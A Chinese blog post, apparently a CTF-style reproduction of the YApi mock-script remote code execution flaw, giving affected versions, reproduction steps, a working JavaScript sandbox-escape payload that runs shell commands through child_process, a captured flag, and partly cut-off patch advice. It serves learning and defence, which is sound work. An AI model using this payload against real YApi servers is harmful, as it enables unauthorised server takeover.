七、【漏洞复现】YApi接口管理平台远程代码执行漏洞

文章讲述了YApi接口管理平台存在的远程代码执行漏洞,攻击者可通过注册、登录后构造特殊请求执行任意代码。文章详细描述了漏洞原理、影响版本、复现步骤、修补建议以及提供了一个检测脚本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

七、【漏洞复现】YApi接口管理平台远程代码执行漏洞 

7.1、漏洞原理

若YApi对外开放注册功能,攻击者可在注册并登录后,通过构造特殊的请求执行任意代码,接管服务器。

7.2、影响版本

YApi<=V1.92 All

7.3、指纹识别

1.有注册登陆主页

2.使用指纹识别类平台识别。 

7.4、漏洞复现

1.注册账号

2.新建项目-名称随意

3.新建接口-接口名称随意-接口路径为/随意

4.在高级mock中配置以下代码并开启

const sandbox = this 
const ObjectConstructor = this.constructor 
const FunctionConstructor = ObjectConstructor.constructor 
const myfun = FunctionConstructor('return process') 
const process = myfun() 
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()

或者

注意上面这段代码的execsync()为命令执行函数
获取flag:
mockJson = process.mainModule.require("child_process").execSync("ls /tmp").toString()

5.点击mock地址执行代码 

flag:

flag-{bmh4e01cda3-7e32-4b21-9722-dc88499528a2}

7.5、修补建议

​YApi接口管理平台存在一种远程代码执行漏洞。攻击者可以在注册并登录YApi后,通过构造特殊的请求来执行任意代码,从而接管服务器。这个漏洞可能会导致严重的安全风险,因此建议用户及时修复漏洞,更新到最新版本的YApi。

1、 更新至最新版本:​​1.12.0​​​

2、 利用安全安全组设置Yapi仅对可信地址开放。
3、 编辑Yapi目录下的 c

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

༄༊ξ陈丞(网安圈花瓶)࿐

点个关注呗。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值